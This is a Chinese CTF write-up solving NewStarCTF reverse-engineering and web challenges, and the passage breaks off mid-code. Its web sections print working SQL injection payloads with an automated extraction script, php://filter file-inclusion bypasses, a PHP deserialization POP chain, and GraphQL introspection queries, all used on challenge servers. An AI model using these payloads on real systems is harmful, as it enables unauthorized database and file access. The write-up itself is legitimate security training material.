Week 2
Re
前可见古人,后得见来者
chipher = [0x51, 0x5B, 0x4C, 0x56, 0x59, 0x4D, 0x50, 0x56, 0x54, 0x43,
0x7D, 0x4C, 0x43, 0x53, 0x7D, 0x50, 0x43, 0x53, 0x7D, 0x47,
0x50, 0x7D, 0x4C, 0x43, 0x53, 0x7D, 0x4E, 0x40, 0x4A, 0x5F, ]
flag = ''
for i in range(len(chipher)):
temp = chr(chipher[i] ^ 0x22)
if temp.islower():
flag += chr((ord(temp) - 97 - 13 + 26) % 26 + 97)
elif temp.isupper():
flag += chr((ord(temp) - 65 - 13 + 26) % 26 + 65)
else:
flag += temp
print(flag)
flag{begin_and_end_re_and_you}
/*********TlsCallback_0_0/
TLS回调函数以及反调试简单使用 - 2f28 - 博客园 (cnblogs.com)
这里的线程回调函数,将偏移值3 变成了 iv+=10,即变成了13
(171条消息) TLS callback_xkdlzy的博客-CSDN博客
FindME
# 小端序 存储
__int64 sub_19B6()
{
int i; // [rsp+8h] [rbp-8h]
int j; // [rsp+Ch] [rbp-4h]
for ( i = 0; i <= 31; i += 4 )
{
for ( j = 0; j <= 3; ++j )
*((_DWORD *)s + i / 4) |= byte_50A0[i + j] << (8 * j);
}
return sub_19A1();
}
#xor
__int64 sub_192E()
{
int i; // [rsp+Ch] [rbp-4h]
for ( i = 0; i <= 7; ++i )
*((_DWORD *)s + i) ^= 0x2022u;
return sub_1919();
}
# 移位
__int64 sub_151D()
{
int i; // [rsp+Ch] [rbp-4h]
for ( i = 0; i <= 7; ++i )
*((_DWORD *)s + i) ^= *((_DWORD *)s + i) >> 17;
return sub_1508();
}
# 密文
__int64 sub_1253()
{
int i; // [rsp+Ch] [rbp-4h]
for ( i = 0; i <= 7; ++i )
{
if ( *((_DWORD *)s + i) != dword_5020[i] )
{
dword_5040 = 0;
return sub_123E();
}
}
return sub_123E();
}
解密py
chipher = [0x67617FF4, 0x6E305341, 0x656C4DE0, 0x69744BEC, 0x625F7460, 0x6F7348F4, 0x656871C9, 0x7D216ED3]
for i in range(8):
temp=(chipher[i]&0xffff8000|(chipher[i]&0x00007fff^chipher[i]>>17)) # 直接逆
temp^=0x2022
for k in range(4):
print(chr(temp>>(k*8)&0xff),end='')
flag{D0nt_let_time_bo_so_cheap!}
Petals
去除花之恋
去花后的核心加密函数
unsigned __int64 __fastcall sub_1209(__int64 a1, unsigned int a2)
{
int i; // [rsp+18h] [rbp-118h]
unsigned int j; // [rsp+1Ch] [rbp-114h]
__int64 v5[33]; // [rsp+20h] [rbp-110h] BYREF
unsigned __int64 v6; // [rsp+128h] [rbp-8h]
v6 = __readfsqword(0x28u);
memset(v5, 0, 256);
for ( i = 0; i <= 255; ++i )
*((_BYTE *)v5 + i) = ~(i ^ a2);
for ( j = 0; a2 > j; ++j )
*(_BYTE *)((int)j + a1) = *((_BYTE *)v5 + *(unsigned __int8 *)((int)j + a1));
return v6 - __readfsqword(0x28u);
}
import hashlib
v5 = [0] * 256
chipher = [0xD0, 0xD0, 0x85, 0x85, 0x80, 0x80, 0xC5, 0x8A, 0x93, 0x89,
0x92, 0x8F, 0x87, 0x88, 0x9F, 0x8F, 0xC5, 0x84, 0xD6, 0xD1,
0xD2, 0x82, 0xD3, 0xDE, 0x87]
for i in range(256):
v5[i] = (~(i ^ 25))&0xff
# print(sorted(v5))
for i in range(len(chipher)):
print(chr(v5.index((chipher[i])%256)),end='')
print()
print(hashlib.md5('66ccff#luotianyi#b074d58a'.encode()).hexdigest())
66ccff#luotianyi#b074d58a 提交后错误!!!
就很奇怪,然后查了一下 洛天依 66ccff 等的含义(无语子)
然后才发现,要MD5后提交!!!
printf("If you are succeed, the flag is flag{md5(your input)}");
笑死!!!!!【没看到,还想着misc的思路去想,,,】
flag{d780c9b2d2aa9d40010a753bc15770de}
Likemyasp
查到 Asp 壳,题目也有提示
找了几个工具都无法脱壳,只能尝试X64debug 脱壳,OD只能调试手动脱壳32 位
[X64debug 不太熟,直接硬逆,不手动脱壳]【下面程序,ida动调+断点跟进获得】
sub_7FF7D92D1070(&_guard_xfg_table_dispatch_icall_fptr[16]);
sub_7FF7D92D1140((__int64)&_guard_xfg_table_dispatch_icall_fptr[18], v10, 30i64);// scanf
for ( i = 0; i < 24; i += 4 )
{
v6 = (v10[i] ^ 0xAi64) << 37;
v5 = (v10[i + 1] ^ 0x14i64) << 23;
v7 = (v10[i + 2] ^ 0x1Ei64) << 14;
v3 = ~v10[i + 3];
v8 = v3 | v7 | v5 | v6;
v9[i / 4] = v8;
}
for ( j = 0; j < 6; ++j )
{
if ( v9[j] != qword_7FF7D92D4010[j + 5] ) // 密文比较
{
sub_7FF7D92D1070(&_guard_xfg_table_dispatch_icall_fptr[19]);
return sub_7FF7D92D1350((unsigned __int64)&v1 ^ v11);
}
}
chipher = [0xD803C1FC098, 0xE20360BC097, 0xFE02A1C00A0, 0xFA0121040CB, 0xF2032104092, 0xD6015884082]
flag = ''
for i in range(len(chipher)):
flag += chr(chipher[i] >> 37 & 0xff ^ 0xa)
flag += chr(chipher[i] >> 23 & 0xff ^ 0x14)
flag += chr(chipher[i] >> 14 & 0xff ^ 0x1e)
flag += chr(~(chipher[i])& 0xff)
print(flag)
flag{x1hu@n_w0_4sp_ma??}
ur_so_naive
0x01 程序分析
导出 libencry.so 分析加密流程
分析知道,获得四位密钥,即可解密程序
v7 = 0;
v8 = (*(int (__fastcall **)(int, int, _DWORD))(*(_DWORD *)a1 + 676))(a1, a3, 0);
v9 = (unsigned __int8 *)(*(int (__fastcall **)(int, int, _DWORD))(*(_DWORD *)a1 + 676))(a1, a5, 0);// v9 应该是密钥
v10 = (*(int (__fastcall **)(int, int))(*(_DWORD *)a1 + 704))(a1, a4);
if ( a4 )
{
do
{
v11 = (_BYTE *)v8;
v12 = (*(unsigned __int8 *)(v8 + v7) >> 1) | (*(unsigned __int8 *)(v8 + v7) << 7);// 分别移位 1|7 2|6 3|5 4|4
*(_BYTE *)(v8 + v7) = v12;
v13 = ((unsigned __int8)(v12 ^ *v9) >> 2) | ((v12 ^ *v9) << 6);
*(_BYTE *)(v8 + v7) = v13;
v14 = ((unsigned __int8)(v13 ^ v9[1]) >> 3) | (32 * (v13 ^ v9[1]));
*(_BYTE *)(v8 + v7) = v14;
v15 = ((unsigned __int8)(v14 ^ v9[2]) >> 4) | (16 * (v14 ^ v9[2]));
*(_BYTE *)(v8 + v7) = v15;
v16 = v15 ^ v9[3];
v17 = v7 + 1;
if ( v7 - a4 != -1 )
v11 = (_BYTE *)(v8 + v17);
*(_BYTE *)(v8 + v7) = v16;
*(_BYTE *)(v8 + v7++) = v16 ^ *v11;
}
while ( v17 != a4 );
}
(*(void (__fastcall **)(int, int, _DWORD, int, int))(*(_DWORD *)a1 + 832))(a1, v10, 0, a4, v8);
return v10;
}
解密py
# 爆破
import hashlib
import itertools
chipher = [0xdc, ord('S'), 0x16, 0x8b, 0x99, 0xf2, 0x08, 0x13, 0xd1, ord('/'), 0x92, ord('G'), 0x02, 0xeb, 0xcc, 0xdc,
0x18, 0x87, ord('W'), 0x8e, 0x87, 0x1b, 0x8f, 0xaa]
# key=[0x7f080058,0x7f08009d,0x7f080180] # 猜测密钥
# 爆破密钥
modle = list(itertools.product(
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',
'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'], repeat=4))
# key = [0x80, 0x01, 0x08, 0x7f]
flag = ''
j=-1
while True:
j+=1
str = ''.join(modle[j])
key=[ord(str[w]) for w in range(len(str))]
for i in range(len(chipher) - 1, -1, -1):
for k in range(30, 128):
temp = (k >> 1) | (k << 7)
temp = (temp ^ key[0] >> 2) | (temp ^ key[0] << 6)
temp = (temp ^ key[1] >> 3) | (temp ^ key[1] << 5)
temp = (temp ^ key[2] >> 4) | (temp ^ key[2] << 4)
temp = temp ^ key[3]
if i == len(chipher)-1:
temp1=k
else:
temp1=chipher[i-1]
if chipher[i]==temp1^temp:
flag+=chr(k)
break
if len(flag) ==len(chipher):
break
print('key:', str)
flag=''
print(flag)
# 显然,复杂度太高,放弃爆破。
0x02 动态调试 .so 文件
名称 地址
Java_com_new_1star_1ctf_u_1naive_MainActivity_encry LOAD:Java_com_new_1star_1ctf_u_1naive_MainActivity_encry
ida 动态调试时,出现
[求助]ida出现FFFFFFFF: got SIGILL signal (Illegal instruction) - 『移动安全讨论求助区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn
(171条消息) 171025 逆向-安卓脱壳(补充实验)_奈沙夜影的博客-CSDN博客
模拟器为x86架构,而导出的.so程序是ARM架构的原因,只能附加真机,也就是手机和ida 配合起来远程调试
[(171条消息) mobile]真机+IDA调试apk中的so_breezeO_o的博客-CSDN博客
【但是这里比较麻烦,真机调试的话,手机需要root权限等好多限制】
再回到jeb,找到导出.so 文件的位置。有新发现,之前导出的是arm的,无法配合模拟器断点调试.so文件【第一次导出的时候没注意】
那么重新导出X86架构的.so文件,就可以动态调试了,嗨,好多小时才搞定这个,直接麻了,但终于搞定了,舒爽。【这里是结合夜游安卓模拟器+ida附加调试】
动态调试获得 密钥 FALL,获得flag。
附上夜游安卓模拟器+ida附加调试方法:
【nox_adb.exe 时模拟器自带的,可以直接相应目录下使用,也可设置到环境变量中(具体不在赘述)】
【adb【Android 调试桥】介绍Android 调试桥 (adb) | Android 开发者 | Android Developers (google.cn)】
nox_adb devices # 查看端口
nox_adb.exe connect 127.0.0.1:62001
adb push F:\CTF_\ctf_tool\Re_tool\ida_pro\IDA_7.7_chinese\dbgsrv\android_x86_server /data/local/tmp (IDA的dbgsrv目录下有很多版本,根据要动态调试的.so文件架构类 型,上传,如这里的是android_x86_server,可以成功运行)
【/data/local/tmp/android_server(这个目录其实可以随便放,可以绕过有的程序的反调试,】
adb shell
cd /data/local/tmp
chmod 777 android_x86_server
./android_x86_server
再开一个cmd, 设置端口转发 【将PC端的23946端口收到的数据,转发给到手机(模拟器)中23946端口。】
adb forward tcp:23946 tcp:23946
如此就可愉快的使用 ida 开始 附加调试了!
0x03 解密py
下图,是动态调试后发现的一个小细节。静态分析时,我没有注意到!
最后一次处理时,data xor enc[0]
#encoding=utf-8
import hashlib
chipher = [0xdc, ord('S'), 0x16, 0x8b, 0x99, 0xf2, 0x08, 0x13, 0xd1, ord('/'), 0x92, ord('G'), 0x02, 0xeb, 0xcc, 0xdc,
0x18, 0x87, ord('W'), 0x8e, 0x87, 0x1b, 0x8f, 0xaa]
key =[0x46,0x41,0x4c,0x4c] # FALL
flag = [0]*24
for i in range(len(chipher) - 1, -1, -1):
for k in range(30, 128):
temp = ((k >> 1) | (k << 7))&0xff
temp = (((temp ^ key[0]) >> 2) | ((temp ^ key[0]) << 6))&0xff
temp = (((temp ^ key[1]) >> 3) | ((temp ^ key[1]) << 5))&0xff
temp = (((temp ^ key[2]) >> 4) | ((temp ^ key[2]) << 4))&0xff
temp = temp ^ key[3]
if i == len(chipher) - 1:
temp1 = chipher[0]
else:
temp1 = flag[i+1] # 因为最后一位,xor 第零位,其他处理 xor 后一位,那么以最后一位为突破口,求出flag
if chipher[i] == temp1 ^ temp:
flag [i]= k
break
# print('第', i, '位 :', k)
print(flag)
for i in range(len(flag)):
print(chr(flag[i]),end='')
flag{n@1ve_luv_2you#ouo}
Web
Word-For-You(2 Gen)
hint:
哇哇哇,我把查询界面改了,现在你们不能从数据库中拿到东西了吧哈哈(不过为了调试的代码似乎忘记删除了
0x01 程序注入分析
xss :
</h><script>alter();</script><h> # 直接过滤了
sql 注入
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
# haha' or 1=1 #
好耶!查询成功
# haha' order by 5 # 猜测出 2 列
Unknown column '5' in 'order clause'
# haha' union select 1,2 #
The used SELECT statements have a different number of columns
显然可以通过报错注入,得到flag
# all db
haha' and extractvalue(1,concat(0x7e,mid((select group_concat(schema_name) from information_schema.schemata limit 0,1),30,30),0x7e))#
XPATH syntax error: '~information_schema,mysql,performance_schema,wfy'
数据库很长
# 数据库 wfy
haha' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
# XPATH syntax error: '~wfy~'
# 表名 wfy_admin,wfy_comments,wfy_info
haha' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='wfy'),0x7e))#
XPATH syntax error: '~wfy_admin,wfy_comments,wfy_info'
# 列名 wfy_admin:Id,username,password,cookie
haha' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='wfy' and table_name='wfy_admin' limit 0,1),0x7e))#
XPATH syntax error: '~Id,username,password,cookie~'
# wfy_comments:id,text,user,name,display
haha' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='wfy' and table_name='wfy_comments' limit 0,1),0x7e))#
XPATH syntax error: '~id,text,user,name,display~'
#
haha' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='wfy' and table_name='wfy_info' limit 0,1),0x7e))#
# 空
# 数据
haha' and extractvalue(1,concat(0x7e,(select * from (select user from wfy_comments limit 0,1) as a),0x7e))#
haha' and extractvalue(1,concat(0x7e,(select * from (select display from wfy_comments limit 0,1) as a),0x7e))#
0x02 解密py
现在,已经知道数据库名,表名,列名。但是由于每次只能获得一条数据,且报错输出长度有限制。那么现在尝试,逐条报错注入获取flag.
import requests
import re
url = 'http://3527aa75-03ba-4f2d-9fef-aff78f745f6d.node4.buuoj.cn:81/comments.php'
result = ''
data = {
"name": "haha' and extractvalue(1,concat(0x7e,(select * from (select display from wfy_comments limit 0,1) as a),0x7e))#"
}
headers = {
"Cookie": "PHPSESSID=a3b7e533a45e3b9087113b3b8fb6ad81"
}
# response = requests.get(url=url, params=data,headers=headers)
# print(response.text)
for i in range(200):
data['name'] = "haha' and extractvalue(1,concat(0x7e,(select * from (select text from wfy_comments limit {0},1) as a),0x7e))#".format(i)
response = requests.get(url=url, params=data, headers=headers)
match = re.findall(r'error\: \'~(.*?)~\'', response.text) # flag{Ju4t_m2ke_some_err0rs}
print(match)
在 wtf wfy_comments text 成功得到 flag
flag{Ju4t_m2ke_some_err0rs}
IncludeOne
hint:
文件包含漏洞系列第一题,也不知道是不是真的随机? 出题人丢给你了一个工具:https://www.openwall.com/php_mt_seed/
0x01 程序分析
<?php
highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."<br>";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){
if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
//flag in `flag.php`
include($_GET['file']);
}else{
echo "Baby Hacker?";
}
}else{
echo "No Hacker!";
} Hint: 1219893521
No Hacker!
(171条消息) CTF_Web:php伪随机数mt_rand()函数+php_mt_seed工具使用_星辰照耀你我的博客-CSDN博客_php rand 伪随机
在php中每一次调用mt_rand()函数,都会检查一下系统有没有播种。(播种为mt_srand()函数完成),当随机种子生成后,后面生成的随机数都会根据这个随机种子生成。所以同一个种子下,随机数的序列是相同的,这就是漏洞点。
那么我们可以通过,种子生成的随机数来爆破,种子。那么就可以得到我们想要的序列。
(172条消息) php_mt_seed - PHP mt_rand() 随机数种子破解使用_like4h的博客-CSDN博客_php_mt_seed 安装
借助题目给的工具。
└─# time ./php_mt_seed 1219893521
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 3988.5 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x01ffffff, speed 0.0 Mseeds/s
seed = 0x0011793a = 1145146 (PHP 7.1.0+)
Found 1, trying 0x16000000 - 0x17ffffff, speed 40.7 Mseeds/s
seed = 0x161c5abb = 370956987 (PHP 5.2.1 to 7.0.x; HHVM)
Found 2, trying 0x64000000 - 0x65ffffff, speed 52.3 Mseeds/s
seed = 0x64a22f28 = 1688350504 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x64a22f28 = 1688350504 (PHP 7.1.0+)
Found 4, trying 0xc4000000 - 0xc5ffffff, speed 52.5 Mseeds/s
seed = 0xc4b59923 = 3300235555 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4b59923 = 3300235555 (PHP 7.1.0+)
seed = 0xc4efe664 = 3304056420 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4efe664 = 3304056420 (PHP 7.1.0+)
Found 8, trying 0xfe000000 - 0xffffffff, speed 53.3 Mseeds/s
Found 8
0x02 爆破种子
不知道,题目所用php版本,就都尝试一下PHP Sandbox - Execute PHP code online through your browser (onlinephp.io)
<?php
mt_srand(1145146);
echo mt_rand()."\n";
echo mt_rand();
//1219893521 1145146
//1202031004 # 正确
POST / HTTP/1.1
Host: 073b1ab1-50eb-4bfa-95de-17a27cfc39be.node4.buuoj.cn:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
guess=1202031004
guess=1202031004
0x03 绕过正则
if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
//flag in `flag.php`
include($_GET['file']);
}else{
echo "Baby Hacker?";
}
# 过滤 base 或 .. (| 或 \.\. 转义. 防止目录穿越)
编码绕过
. => %2e
/ => %2f
% => %25 (双重URL编码)
http://6d0e7775-ad5d-413a-8a66-37fbb2ef74d4.node4.buuoj.cn:81/flag.php # 可以访问,但没显示。显然flag.php在当前目录
显然是filter伪协议读取,但怎么绕过
读取文件源码可以直接用resource读取(常用)
php://filter/convert.base64-encode/resource=flag.php base64编码 ---最常用的
php://filter/convert.quoted-printable-encode/resource=flag.php quoted-printable编码
php://filter/string.rot13/resource=flag.php rot13变换
(172条消息) 伪协议filter_php://filter在一次CTF中base被过滤的利用_小明斗的博客-CSDN博客
改为
php://filter/read=string.toupper|string.rot13/resource=NewStar/../../../../../flag.php
===> %252e%252e # 双重编码【获取失败】
如下,NewStar位置应该置于filter后,不影响语句功能,然后保证file中出现NewStar。
php://filter/NewStar/string.rot13/resource=flag.php
得到 rot13
<!--?cuc //synt{66qqr83p-o1qo-4338-nq7r-32r9o986632q}
-->
rot13 解码得到flag
flag{66dde83c-b1db-4338-ad7e-32e9b986632d}
UnserializeOne
0x01 pop 链分析
PHP反序列化研究 - 知乎 (zhihu.com)
(172条消息) CTF之萌新反序列化学习_bmth666的博客-CSDN博客_ctf 反序列化
参考后,构建pop 链
<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
public $name;
protected $func;
public function __destruct() //2. 将name设置为Sec类,触发__toString()
{
echo "Welcome to NewStarCTF, ".$this->name;
}
public function __isset($var) //6.将类名当作函数使用,触发__invoke(),得到flag
{
($this->func)();
}
}
class Sec{
private $obj;
private $var;
public function __toString() //3.调用一个不可访问方法时调用$this->obj->check,__call 会被调用。同时这里的 $this->var 构建pop链时有用到。
{
$this->obj->check($this->var);
return "CTFers";
}
public function __invoke()
{
echo file_get_contents('/flag');
}
}
class Easy{
public $cla;
public function __call($fun, $var) //4.使用 clone 关键字拷贝完成一个对象后,新对象会自动调用定义的魔术方法 __clone()
{
$this->cla = clone $var[0];
}
}
class eeee{
public $obj;
public function __clone() //5.对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用
{
if(isset($this->obj->cmd)){
echo "success";
}
}
}
if(isset($_POST['pop'])){
unserialize($_POST['pop']); // 1. 反序列化,触发__destruct()析构函数
}
如上所示pop 链分析清楚了。
0x02 构造反序列化数据
<?php
class Start{
public $name;//='Sec';
protected $func;//='Sec';
function __construct(){
$this->name=new Sec();
$this->func=new Sec();
}
class Sec{
private $obj; //='Easy';
public $var;
function __construct(){
// $this->var=new eeee(); $var 有传递作用,要直接赋值,将属性改为public
$this->obj=new Easy();
}
}
class Easy{
public $cla;//='eeee';
}
class eeee{
public $obj;//='Start';
}
$Sta=new Start();
$ee=new eeee();
$ee->obj=$Sta;
$Se=new Sec();
$Se->var=$ee;
$Sta->name=$Se;
echo urlencode(serialize($ee));
O%3A4%3A%22eeee%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A5%3A%22Start%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A3%3A%22Sec%22%3A2%3A%7Bs%3A8%3A%22%00Sec%00obj%22%3BO%3A4%3A%22Easy%22%3A1%3A%7Bs%3A3%3A%22cla%22%3BN%3B%7Ds%3A3%3A%22var%22%3Br%3A1%3B%7Ds%3A7%3A%22%00%2A%00func%22%3BO%3A3%3A%22Sec%22%3A2%3A%7Bs%3A8%3A%22%00Sec%00obj%22%3BO%3A4%3A%22Easy%22%3A1%3A%7Bs%3A3%3A%22cla%22%3BN%3B%7Ds%3A3%3A%22var%22%3BN%3B%7D%7D%7D
最终得到flag:
flag{87fbd8ce-bc28-463c-9588-b207042b878e} Welcome to NewStarCTF, CTFers
ezAPI
0x01 题目分析
查阅 DEBUG: object(stdClass)#1 (1) { ["users_user_by_pk"]=> NULL }
php中stdClass的用法详解-php教程-PHP中文网
相关信息没什么进展,然后尝试目录扫描,看有无收获。
在使用 WebPathBurp 扫描目录【用自带的字典来跑】时发现 WWW.zip 备份文件。获得源码!
<?php
error_reporting(0);
$id = $_POST['id'];
function waf($str)
{
if (!is_numeric($str) || preg_replace("/[0-9]/", "", $str) !== "") { //只能输入数字
return False;
} else {
return True;
}
}
function send($data)
{
$options = array(
'http' => array(
'method' => 'POST',
'header' => 'Content-type: application/json',
'content' => $data,
'timeout' => 10 * 60
)
);
$context = stream_context_create($options);
$result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
return $result;
}
if (isset($id)) {
if (waf($id)) { // $data 是可控的
isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}';
$res = json_decode(send($data));
if ($res->data->users_user_by_pk->name !== NULL) {
echo "ID: " . $id . "<br>Name: " . $res->data->users_user_by_pk->name;
} else {
echo "<b>Can't found it!</b><br><br>DEBUG: ";
var_dump($res->data);
}
} else {
die("<b>Hacker! Only Number!</b>");
}
} else {
die("<b>No Data?</b>");
}
?>
$data = {"query":"query{\nusers_user_by_pk(id:flag) {\nname\n}\n}\n", "variables":null}
POST 方式提交的data数据是可控的!
发送到 $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
// graphql
0x02 graphql 数据查询
GraphQL-接口查询利器 - 知乎 (zhihu.com)
当CTF遇上GraphQL的那些事 (hwlanxiaojun.github.io)
(172条消息) 渗透测试之graphQL_Sp4rkW的博客-CSDN博客_graphql 注入
id=3&data = {"query":"query{\nusers_user_by_pk(id:3) {\nname\n}\n}\n", "variables":admin}
id =3 对应 admin
data={"query":"query{\nusers_user_by_pk(id:3) {\nname,\n}\n}\n", "variables":null}&id=4
id =4 对应 admin 显然参数可控了。那么就是查询数据库的内容了
# 查看存在的class
data={"query":"{ __schema {types {name}}}"}&id=4
# 最终发现大佬博客中,存下如下payload,可以得到Graphql 所有字段
data={"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ","variables":null}&id=4
//data={"query":"{ __schema {types {name}}}"}&id=4
查询到所有信息【该API端点的所有信息】
存于 info_Graphsql_.txt, 内容太多,这里就不贴上了
得到关键类信息,但怎么利用查询呢!
// flag 位于 ffffllllaaagggg_1n_h3r3.flag 表
[13]=>
object(stdClass)#181 (8) {
["kind"]=>
string(6) "OBJECT"
["name"]=>
string(28) "ffffllllaaagggg_1n_h3r3_flag"
["description"]=>
string(59) "columns and relationships of "ffffllllaaagggg_1n_h3r3.flag""
["fields"]=>
array(1) {
[0]=>
object(stdClass)#182 (6) {
["name"]=>
string(4) "flag"
["description"]=>
NULL
["args"]=>
array(0) {
}
["type"]=>
object(stdClass)#183 (3) {
["kind"]=>
string(8) "NON_NULL"
["name"]=>
NULL
["ofType"]=>
object(stdClass)#184 (3) {
["kind"]=>
string(6) "SCALAR"
["name"]=>
string(6) "String"
["ofType"]=>
NULL
}
}
["isDeprecated"]=>
bool(false)
["deprecationReason"]=>
NULL
}
}
["inputFields"]=>
NULL
["interfaces"]=>
array(0) {
}
["enumValues"]=>
NULL
["possibleTypes"]=>
NULL
}
# 如上 flag 就位于 ffffllllaaagggg_1n_h3r3_flag 中
结合题目泄露的源码的查询方式,进行Graphsql 查询!
data={"query":"query{\nffffllllaaagggg_1n_h3r3_flag{\nflag\n}\n}\n", "variables":null}&id=4
得到flag
DEBUG: object(stdClass)#2 (1) {
["ffffllllaaagggg_1n_h3r3_flag"]=>
array(1) {
[0]=>
object(stdClass)#1 (1) {
["flag"]=>
string(42) "flag{4a902c8e-a8b5-ecfb-bee3-d6419865647c}"
}
}
}
flag{4a902c8e-a8b5-ecfb-bee3-d6419865647c}
Week 3
Re
Zzzzzz3333
直接 z3 求解key,即可得到flag
import base64
from z3 import *
Arglist=[]
for i in range(8):
Arglist.append(Int(str(i)))
s = Solver()
v13 = Arglist[5]
v11 = Arglist[4]
v9 = Arglist[1]
v12 = Arglist[3]
v8 = Arglist[7]
v10 = Arglist[0]
s.add(Arglist[3]
+ 4 * Arglist[2]
+ Arglist[7]
+ 4 * (Arglist[3] + 4 * Arglist[2])
+ 3 * (Arglist[4] + 4 * Arglist[0])
+ 2 * (Arglist[5] + 4 * Arglist[6])
+ 11 * Arglist[1] == 6426)
s.add(11 * (v10 + v8 + v12) + 4 * (v13 + 2 * v11) + Arglist[2] + 45 * v9 + 7 * Arglist[6] == 9801)
s.add(5 * v9
+ 2 * (v11 + Arglist[6] + v13 + 2 * (v8 + v12) + Arglist[2] + 2 * (Arglist[6] + v13 + 2 * (v8 + v12)) + 8 * v10) == 6021)
s.add(19 * v10 + 9 * v9 + 67 * v8 + 5 * (Arglist[2] + Arglist[6]) + 7 * (v13 + 4 * v12) + 4 * v11 == 14444)
s.add(22 * v13 + 5 * (v11 + 2 * (v12 + v9 + 2 * v10)) + 4 * (v8 + Arglist[6]) + 6 * Arglist[2] == 7251)
s.add(19 * v12
+ 3 * (v8 + Arglist[2] + 4 * v8 + Arglist[6] + 2 * (v8 + Arglist[2] + 4 * v8))
+ 4 * (v10 + v13 + v9 + 2 * (v10 + v13)) == 10054)
s.add(7 * v10 + 17 * (v12 + v9*2) + 11 * (v11 + 2 * v13) + 2 * (Arglist[2] + Arglist[6] + 4 * Arglist[2] + 6 * v8) == 10735)
s.add(Arglist[6] + v11 + 11 * Arglist[2] + 15 * (v12 + 2 * v8) + v9*2 + 43 * v10 + 21 * v13 == 11646)
print (s.check())
m = s.model()
print (m)
flag_ = ""
for i in Arglist:
flag_ += chr(int(str(m[i])))
print(flag_) # key= fallw1nd
key= fallw1nd
flag{Zzzz333_Is_Cool!!!}
The Slider's Labyrinth
The Slider's Labyrinth
滑块的迷宫
简单nop E8 去除花指令
main函数
分析知道 maze 16行 ,如下: * 起点 0 终点
maze: [注意,这里每选择一个方向,走到不能走【while() 那完成这项处理】]
################
#* # #
# #
# # #
## #
# # ##
# # #
# #
# # # O#
################
dsasdwds
print(hashlib.md5('dsasdwds'.encode()).hexdigest())
# dsasdwds
flag{f71516bdf07abd7bc0668db9d6352364}
EzTea
key===>{0x19,0x19,0x8,0x10}
这里分析可以知道是XXTEA加密,网上很多脚本,简单修改delta, 加密的移位处理即可得到flag。
例如下面:
#include <cstdint>
#include <cstdio>
#define DELTA 0x11451400
#define MX (((z ^ (key[(e ^ p) & 3])) + (y ^ sum)) ^ (((32 * z) ^ (y >> 3)) + ((4 * y) ^ (z >> 4))))
uint8_t ida_chars[] =
{
